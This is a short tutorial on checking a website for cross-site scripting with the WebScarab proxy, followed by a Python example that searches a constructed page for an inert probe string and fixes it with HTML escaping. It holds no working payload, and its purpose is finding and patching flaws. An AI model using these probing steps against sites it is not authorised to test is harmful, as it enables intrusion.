In this tutorial we will discuss the XSS attack using WebScarab. First, an introduction:
Cross-Site Scripting (XSS) is
a type of computer security vulnerability typically found in Web
applications (such as web browsers through breaches of browser security)
that enables attackers to inject client-side script into Web
pages viewed by other users. A cross-site scripting vulnerability may be
used by attackers to bypass access controls such as the same-origin
policy.
Now I'll show how to check for an
XSS vulnerability in the
www.xyz.com website.
First of all, configure the proxy (localhost with port
8008) in the browser, then open the website in the browser.
You will then see the following result in WebScarab, as shown in
the figure:

To check for the XSS vulnerability, click on the XSS/CRLF tab and see the result, as in the figure:

After checking this result, click on
Edit Text Strings;
it will show the script that will be injected. Click
OK, then click Check, and you get the following result, as
shown in the figure:

Click on the
Summary tab again, as shown:

And double-click on the arrow given in the above figure and

The above figure shows the XML code of that particular page and the
particular location where the XSS attack works. Here you can find
the vulnerability and change your code according to the attack it
shows.

This is the actual line of code where the XSS attack works. In
the image below the text format is also given, and from here you can
change your code and patch the vulnerability.
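
The check-and-patch idea from the steps above, as an added example that is not part of the original post: a probe string is sent as a parameter, the response is searched for a verbatim copy, and the fix is to HTML-encode the value before it is written into the page. The page template, the `q` parameter and the inert probe marker are constructed for illustration.

```python
import html

# Constructed, inert marker: it carries the characters (" < >) that output
# encoding must neutralise, but no script.
PROBE = '"><probe-7f3a>'


def render_vulnerable(query):
    """Hypothetical search page that writes the parameter into HTML as-is."""
    return (f'<form><input name="q" value="{query}"></form>'
            f'<p>Results for {query}</p>')


def render_fixed(query):
    """Same page with the value HTML-encoded for body and attribute context."""
    safe = html.escape(query, quote=True)
    return (f'<form><input name="q" value="{safe}"></form>'
            f'<p>Results for {safe}</p>')


def reflection_points(body, probe):
    """Return (offset, surrounding text) for every verbatim copy of the probe.

    A verbatim copy means the application echoed the input without encoding
    it, which is the line of code that needs patching.
    """
    hits = []
    start = body.find(probe)
    while start != -1:
        snippet = body[max(0, start - 20):start + len(probe) + 20]
        hits.append((start, snippet))
        start = body.find(probe, start + 1)
    return hits


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("fixed", render_fixed)):
        hits = reflection_points(render(PROBE), PROBE)
        print(f"{name}: {len(hits)} unencoded reflection(s)")
        for offset, snippet in hits:
            print(f"  at offset {offset}: ...{snippet}...")
```
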